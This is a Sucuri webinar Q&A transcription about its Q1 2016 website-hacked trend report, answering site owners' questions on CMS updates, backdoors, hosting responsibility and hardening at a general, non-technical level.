Website Hacked Trend Report Q1/2016

June 1st, 2016 at 11am PST • Tony Perez & Daniel Cid - Sucuri Co-Founders

On May 18, 2016, we released our first Website Hacked Trend Report, providing insights on the top open-source CMS security, out-of-date software, and the specific malware families we work with every day. Sucuri Co-Founders Tony Perez and Daniel Cid dive into the details of trends for Q1 2016 including Drupal, WordPress, Joomla! and Magento.

Victoria • Canada • Home of Sucuri's
Ben Remediation Lead, Alycia Analytics & SEO
& Jen Customer Happiness

Tony Perez & Daniel Cid

@perezbox

@danielcid

Sucuri Co-Founders.

Questions & Answers

Question #1: Is more secure use a wordpress install in Windows IIS vs Linux?

Answer: WordPress can be used securely on both Windows and Linux. If you are more familiar with Linux and you can manage it well, use it on Linux. If Windows is your operating system of choice and you can harden it properly, use it on Windows.

Question #2: Are they saying that the out of date platforms is due to us (the end user) not updating the platforms? Or those that created the plugins not providing updates?

Answer: We’re saying that the problem today exists because of poor management and administration by website owners. Website owners today seek the “easy button” in all things, including security. This is the mindset that most website owners have. This is facilitated by the idea that creating and maintaining a website is easy.

Question #3: Does having a dedicated site works best in minimizing hacking?

Answer: Not sure we understand the question here. Ideally you have a functionally isolated environment, where you’re not having a onetomany relationship between account and websites. So no more 1 account with 50 websites installed.

Transcription

Questions & Answers

Question #1: Is more secure use a wordpress install in Windows IIS vs Linux?

Answer: WordPress can be used securely on both Windows and Linux. If you are more familiar with Linux and you can manage it well, use it on Linux. If Windows is your operating system of choice and you can harden it properly, use it on Windows.

Question #2: Are they saying that the out of date platforms is due to us (the end user) not updating the platforms? Or those that created the plugins not providing updates?

Answer: We’re saying that the problem today exists because of poor management and administration by website owners. Website owners today seek the “easy button” in all things, including security. This is the mindset that most website owners have. This is facilitated by the idea that creating and maintaining a website is easy.

Question #3: Does having a dedicated site works best in minimizing hacking?

Answer: Not sure we understand the question here. Ideally you have a functionally isolated environment, where you’re not having a onetomany relationship between account and websites. So no more 1 account with 50 websites installed.

Question #4: How is it that my hosting company was unable to detect my site being hacked but I and Google was able to locate it? Even after the hosting site doing a test run they were still unable to detect it.

Answer: Hosting companies are not antimalware companies and they generally do not have the tools and expertise necessary to find the newest infections. Their business is hosting and their goal is to provide a secure space for you to deploy your site. What happens inside the site is your responsibility. You have to think of hosting companies more like a cable or internet provider. They are responsible for providing you connectivity and a "space" online, nothing else.

Question #5: Is a theme site hack the same as an SEO Spamming? We used a theme and customized it but discovered years later that the theme was not updated, what does this mean?

Answer: A theme site hack can be used by an attacker to achieve multiple objectives, one of them is SEO Spam. As for the lack of updates, it would fall into your responsibility as the website owner, or on whoever was responsible for maintaining the site

Question #6: When hacking is done can it also affect your email accounts tied to that site as well?

Answer: It depends a lot on the type of compromise and where your email server is hosted. Generally a websitespecific hack won't affect your email, but it is really dependent on the level of access the attackers can get and their objectives.

Question #7: Do you have the "Infected Websites" numbers related in proportion of installations?

Answer: No

Question #8: I have nobody to care about my websites security, does Sucuri cover all security aspects so I can just install and relax?

Answer: We provide a service that covers a number of security aspects. Most everything should be addressed, but we like to encourage a relationship with our customers where it’s a balanced engagement. We’ll do a lot, but website owners have to do their part. (i.e., if you don’t properly configure, or use good passwords, there will be problems).

Question #9: What's the difference between iThemes and Sucuri, now that iThemes uses Sucuri for Malware search/removal?

Answer: iThemes is a great application security plugin to help harden your WordPress installation. Sucuri is a website security company, offering a full suite of securityrelated services that are platform agnostic. We protect websites via our Firewall, monitor for issues via our monitoring platform, and provide professional incident response services when everything goes to crap. iThemes does integrate our monitoring service, but if it detects an issue, they encourage website owners to come directly to us in order to enhance their security.

Question #10: I love Sucuri Team. By the way, i meet personally Tony in the Joomla WOrld Conference in Bangalore, last year :)

Answer: Ah thanks, means the world to us!

Question #11: When a website is compromised in your experience the attacker routinely logs in to install additional software, "manage it", create other users, etc or is this an automated process done strictly through bots or other means?

Answer: A majority of the instances we see are automated. They also do install and configure new users. Automation is key for attackers.

Question #12: After you identify an infection if you solely restrict access to the administration area through htaccess or specific ip's login allowances, how well that tactic works to begin the identification and clean up process to prevent future incidents?

Answer: It honestly depends on a number of things, including whether the attacker has direct access to the web server via a backdoor. If they have backdoor access, restricting to an admin role will do little to protect you.

Question #13: How about a bullet list of things to do for website hardening (settings on the Sucuri website).

Answer: Great recommendation, we’ll look into this.

Question #14: For Tony and Dani: the failure to update sites in our case was due to the fact that our developer never discussed the importance of updating. Additionally, all of our experiences / nightmares related to MS Windows OS updates makes one naturally hesitant to update. As for my wp site, I now update immediately.

Answer: We agree, this is a big problem. It’s like what we said on the webinar, it’s very easy to tell people “just update” but it’s a different thing altogether to be the person that has to do the updating. When we look at the statistics, yes a small percentage of people have issues on platforms on WordPress, but that’s not the case on other platforms. And even on WordPress, who wants to be part of that small percentage? And we’re just talking core, move into plugins and themes and things become more complicated.

Question #15: How can we find and delete a backdoor on a WP site?

Answer: Backdoors are a special type of malware that is made to be hidden and hard to find. We talk more about them here and provide tips on how to find & Deall with Backdoors

Question #16: I know host like wpengine list plugins they abhor (or prefer). That implies that some plugins are insecure. Does anyone publish a public list of the worst?

Answer: Not that we’re aware of. Those lists aren’t just about insecurity though, it could have resource implications within their environment as well.

Question #17: is there a way of making all updates automatically? greetings from switzerland insteed of making them monthly

Answer: The update frequency is fully dependent on the developers. You could look into maintenance companies like maintainn.com or even a tool like iThemes Sync to help manage multiple web properties if on WordPress. If on Drupal, you could look at services like Drop Guard.

Question #18: Top 3 things web owners can do to prevent an attack on their WordPress site Q: How to detect attacks when not blatantly obvious?

Answer: 1 Focuson their Access Control 2 Employ Website Application Firewall << Will address “not blatant” attacks 3 Start doing basic Website Administration and Management

Question #19: Do you have any stats about which popular hosting companies are hacked more than others? (i.e., GoDaddy vs BlueHost vs HostGator and other popular shared hosting servers)

Answer:No, we don't.

Question #20: Do you have any suggestions for getting web clients to take security seriously? We offer a great rate to provide website monitoring and monthly software updates. Half of my clients say 'thanks, but no thanks'. I keep going back and share stories of sites that we have had Sucuri clean up. They still don't get it.

Answer:Introducing the discussion early in the conversation, talking discovery phase of a project. Unfortunately,some people won’t ever get it until they feel the pain.

Question #21: Given that so many script based vulnerabilities are coming via HTTP POST doyou recommend trying to set up logging of HTTP POST for forensics?

Answer:Sure, that’s always a good idea if you know what you’re doing. The more information you record, the better it’ll be to perform forensics later.

Question #22: Hi, Tom here. we are using your services already. My question is. Does your WebsiteMonitoring cover discovering SEOSpamming? and can you detect SEO Spamming with your scanners?

Answer:Absolutely!

Question #23: how do I know if a plugin is still actually used?

Answer:Depending on what platform you’re using, if you log into your administration panel it should tell you if it’s active or inactive.

Question #24: How do you educate Wordpress administrators on advanced malware attack removal before it spreads pass early detection?

Answer:Very carefully.. :).. But honestly, it’s difficult. Security is a fulltime job, and why we say it’s not a DIY project

Question #25: How do you educate Wordpress administrators on advanced malware attack removal before it spreads pass early detection?

Answer: Advanced Persistent Threats (APT) is not necessarily something we see affecting most website owners. They’re often targeting large enterprises / organizations. If you’re concerned with this definitely engage our team and we’ll engage to better understand your requirements and current challenges.

Question #26: I am looking at using the Soliloquy slider. Do you have any experience with the security of this plugin?

Answer: Nope, sorry.

Question #27: I get so many spammed "comments" and "new users" that I removed comments and abilities for others to join. But I STILL get loads of comments and "joins." Can't find how the sites are being accessed.

Answer: It depends a lot on the CMS and what modules / plugins you have installed. We would need more information to help out.

Question #28: I had 7 Wordpress site with malware of Bluehost, all got blacklisted by Google. Why did they all get hit and not just some?

Answer: Once an attacker has access to an environment it only makes sense to affect as many properties as possible. This doesn’t mean it always happens this way, but in many instances it does. The attackers automated bots look for specific files, once it finds them it injects the payload like a worm.

Question #29: I notice that there are many attacks on my fonts in my plugins folders, what are they trying to change to compromise my site from there?

Answer:Good place to hide a backdoor.

Question #30: I see a lot of .htaccess redirects. Is this because the CMS needs to be hardened or should the host be hardened?

Answer: Well if the attacker is compromising your website and injecting malicious redirects on your .htaccess then I’d say you definitely have a few security issues going on.

Question #31: If a site continues to get 404 errors reported in Google Search Console is that a sign of a website infection or just an attempt at SpamSEO? How do you stop the continual spam 404 errors?

Answer: We wrote a great article on this here

Question #32: In the case of something like TimThumb, that's buried inside of OTHER plugins, so people don't see it on their list of plugins, and they have no idea. Especially if it's an old plugin that isn't being maintained anymore, so you don't ever see an update for that dangerous plugin. How many of us might never notice that some plugin we installed 4 years ago haven't been updated in 2 or 3 years? I'm a conscientious manager, but I struggle with this one " Wait, it's been HOW LONG?" And that doesn't even go into the issue of having to research updates to see if they're likely to break my site. Maintaining plugins is the biggest problem I have.

Answer: Yes, agree, this is a tough one. Same applies to plugins that are embedded into themes and frameworks (i.e., RevSlider).

Question #33: Most clients don't want to pay for management, what to do?

Answer: Yeah, this is a tough one. Sometimes with some education and communication they will understand the needs, other times they only learn once they feel the pain of a compromise

Question #34: My client's site got hacked by Rokui'SH was a Joomla platform, going to move to WP Engine Host. They got her database, so we shut it down. Can you work with wpengine?

Answer: If it’s a Joomla! CMS you won’t be able to move to WP Engine, they are focused specifically on WordPress. But yes, we can work with them.

Question #35: Regarding test sites, my organization uses the GoDaddy Managed WordPress platform, which offers 1click staging. I've been told these staging sites aren't a vulnerability for us despite the fact that the plugins/themes are not kept uptodate (though the core is). These staging sites are discouraged from search engines but they aren't passwordprotected. Do you get the sense that these sites could be problematic, and if so, how do you suggest I address this with GoDaddy?

Answer: It depends, don’t know exactly how they’re configured. If those staging sites are on the same account or server they could be a problem. Without knowing more on how they do it, it’s hard to say.

Question #36: So much info about htaccess robots.txt and wpconfig php and what should be or not should be included. Can sucuri provide a basic start point for securing through these methods. for the different platforms??

Answer: We stopped doing this because it’s completely unmanageable. It’s why we have the Sucuri Firewall now, the threat landscape changes daily. To try to maintain a list like that would be too much for even the most motivated website administrator.

Question #37: This has probably been asked a number of times, but I have had nothing but issues with audio and video on this webinar will the recording be made available to participants?

Answer: Yes, it will, and sorry about that. We’re looking into ways to improve this in the future.

Question #38: This is the first webinar that has been held on a day I could attend. Is it possible to get recordings of previous webinars? I would really like to view more!

Answer: Yes you can view all of our webinars here

Question #39: What hosting companies do you recommend?

Answer: It honestly depends on what you’re looking to do. There are some great unmanaged platforms where you can deploy your servers, like Linode, AWS, Google and Digital Ocean. You can also use providers that do some of the work for you, including SiteGround, WPEngine and many others, depending on your needs and budget.

Question #39: What is your recommendation for keeping track of Joomla Plugins/Components which do not use the Joomla Update system. Is there a website which collects this information on Joomla plugins?

Answer: If you are using any premium/ paid extension, I recommend checking with the developer if they have a security mailing list and tracking that. The Joomla! Vulnerable Extensions List is a great resources as well.

Question #39: You spoke about hardening WP when installing. It's a manual process. Do you ever foresee the WP Development team writing a script to do that automatically upon installation?

Answer: The web is moving to a secure by default mindset, so some of the work is being done by default and will get better over the years. However, a lot of the hardening is also specific to your hosting and usage, and that will have to be done manually.